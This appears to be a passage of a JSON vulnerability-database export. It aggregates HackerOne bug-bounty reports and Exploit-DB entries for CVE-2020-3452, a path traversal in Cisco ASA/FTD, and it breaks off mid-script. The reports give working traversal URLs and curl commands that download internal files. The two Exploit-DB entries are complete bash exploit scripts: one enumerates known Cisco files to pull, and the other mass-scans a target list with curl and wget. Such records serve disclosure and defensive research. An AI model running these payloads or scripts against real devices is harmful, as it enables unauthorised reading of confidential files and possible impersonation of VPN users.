CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n- cvss-score: 7.50\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nCisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nPlease do this GET request below.\n\n- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\nSecond attack type:\n\n- https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\nYou can see the file can be downloaded.\n\n## Suggested Mitigation/Remediation Actions\nPlease upgrade to the latest version of the software.\n\nBest regards.\n@pirneci\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-20T13:53:52", "type": "hackerone", "title": "U.S. Dept Of Defense: CVE-2020-3452 on https://\u2588\u2588\u2588\u2588\u2588/", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-03-18T19:05:51", "id": "H1:1455257", "href": "https://hackerone.com/reports/1455257", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:32", "bounty": 150.0, "description": "CVE-2020-3452 on webvpn.city-srv.ru", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-02T07:46:05", "type": "hackerone", "title": "Mail.ru: [webvpn.city-srv.ru] Path traversal via CVE-2020-3452", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-03-25T07:03:36", "id": "H1:949560", "href": "https://hackerone.com/reports/949560", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:25:44", "bounty": 0.0, "description": "i found out that https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ncurl -kv https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ \n\nOutput\n```\nServer certificate:\n* subject: C=US; \u2588\u2588\u2588\u2588.mil\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-29T22:49:28", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-05-12T20:02:41", "id": "H1:1555021", "href": "https://hackerone.com/reports/1555021", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:26", "bounty": 0.0, "description": "**Summary:**\nI discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n## Impact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## Step-by-step Reproduction Instructions\n- In a web browser, navigate to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n- Once URL is fully loaded, you will be prompted to download file `translation-table` that represents `portal_inc.lua` which you can then open and observe its content.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\n- Alternatively, you can execute the below linux bash terminal command to download that same file `portal_inc.lua`: \n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" --output portal_inc.lua \n```\n\n- You can download various internal files using curl flag `--output` to output the binary data to a file:\n \n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js \n```\n\n## Product, Version, and Configuration (If applicable)\nWebApp endpoint\n\n## Suggested Mitigation/Remediation Actions\n- Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n- This advisory is available at the following link https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-16T00:50:48", "type": "hackerone", "title": "U.S. Dept Of Defense: Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-04-02T18:47:46", "id": "H1:959679", "href": "https://hackerone.com/reports/959679", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:26", "bounty": 0.0, "description": "**Summary:**\nI discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n## Impact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## Step-by-step Reproduction Instructions\n- In a web browser, navigate to https://\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n- Once URL is fully loaded, you will be prompted to download file `translation-table` that represents `portal_inc.lua` which you can then open and observe its content.\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n- Alternatively, you can execute the below linux bash terminal command to download that same file `portal_inc.lua`: \n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" --output portal_inc.lua \n```\n\n- You can download various internal files using curl flag `--output` to output the binary data to a file:\n \n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js \n```\n\n## Product, Version, and Configuration (If applicable)\nWebApp endpoint\n\n## Suggested Mitigation/Remediation Actions\n- Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n- This advisory is available at the following link https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-16T23:32:49", "type": "hackerone", "title": "U.S. Dept Of Defense: Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-04-02T18:46:36", "id": "H1:960082", "href": "https://hackerone.com/reports/960082", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:39:15", "bounty": 0.0, "description": "**Summary:**\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 is vulnerable to Read-Only Path Traversal Vulnerability as described at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n**Description:**\nGet request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.\n\nAccording to Cisco:\nThe vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device.\n\n## Step-by-step Reproduction Instructions\n## In Browser:\n1. Copy and paste into your browser: \u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\"\n2. Note the file being requested to be download. This will be the source code for portal_inc.lua which is not normally accessible. \n\n##In curl:\n1. curl -k \"\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" to prove you can read internal files such as the /+CSCOE+/portal_inc.lua file.\n2. Various internal files can be read, and some require using the --output command to output the data to a file as shown in step 3.\n3. curl -k \"\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/http_auth.html&default-language&lang=../\" --output session.js\n\n## Product, Version, and Configuration (If applicable)\nAnyConnect SSL VPN -webvpn\nClientless SSL VPN - webvpn\n\n## Suggested Mitigation/Remediation Actions\nUpdate the software to the latest version via the Cisco advisory linked above in the Summary.\n\n## Impact\n\nAn attacker can view arbitrary files within the web services file system on the targeted device that are meant to be internal or confidential. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. \nCVSS Score: Base 7.5\nVector: https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-15T02:08:55", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588 is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-09-03T17:24:29", "id": "H1:959187", "href": "https://hackerone.com/reports/959187", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:06", "bounty": 150.0, "description": "CVE-2020-3452 on webvpn.city-srv.ru", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-11-01T10:57:59", "type": "hackerone", "title": "Mail.ru: CVE-2020-3187 \u043d\u0430 ip \u0430\u0434\u0440\u0435\u0441\u0435 91.231.115.30", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3452"], "modified": "2021-05-06T12:42:27", "id": "H1:1023792", "href": "https://hackerone.com/reports/1023792", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T03:23:14", "bounty": 500.0, "description": "Steps to reproduce:\n I could delete arbitrary files from https://79.142.21.220/ using CVE-2020-3187.\n\nPOC video is attached.\n\nBrowser/OS: Chrome/Windows\n\nALSO Cisco ASA - Arbitary File Read - CVE-2020-3452\n\nthe file downloaded also attached here for poc\n\n## Impact\n\nImpact: RCE is P1 critical vulnerability, which can be used to make any server non functional causing millions of dollars loss.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-28T07:06:17", "type": "hackerone", "title": "QIWI: CVE-2020-3187 - unauthenticated arbitrary file deletion in Cisco", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3452"], "modified": "2021-09-24T20:37:41", "id": "H1:944665", "href": "https://hackerone.com/reports/944665", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:06:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-12T00:00:00", "type": "exploitdb", "title": "Cisco ASA and FTD 9.6.4.42 - Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3452", "CVE-2020-3452"], "modified": "2020-10-12T00:00:00", "id": "EDB-ID:48871", "href": "https://www.exploit-db.com/exploits/48871", "sourceData": "# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal\r\n# Date: 2020-10-10\r\n# Exploit Author: 3ndG4me\r\n# Vendor: www.cisco.com\r\n# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html\r\n# CVE : CVE-2020-3452\r\n\r\n\r\n\r\nTARGET=$1\r\nCISCO_KNOWN_FILES=\"logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen\"\r\nmkdir cisco_asa_files\r\n\r\nif [ -z \"$1\" ];\r\nthen\r\n echo \"Usage: cve-2020-3452.sh <target ip/hostname>\"\r\n echo \"Example: cve-2020-3452.sh mytarget.com\"\r\n echo \"Files that are downloaded will be in the newly created 'cisco_asa_files' directory\"\r\n echo \"Target not specificed...exiting...\"\r\nelse\r\n for FILE in $CISCO_KNOWN_FILES;\r\n do\r\n curl \"https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../\" | tee cisco_asa_files/$FILE;\r\n done\r\nfi", "sourceHref": "https://www.exploit-db.com/download/48871", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T02:09:54", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-28T00:00:00", "type": "exploitdb", "title": "Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3452", "CVE-2020-3452"], "modified": "2020-07-28T00:00:00", "id": "EDB-ID:48722", "href": "https://www.exploit-db.com/exploits/48722", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file read\r\n# CVE: CVE-2020-3452\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? ) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo 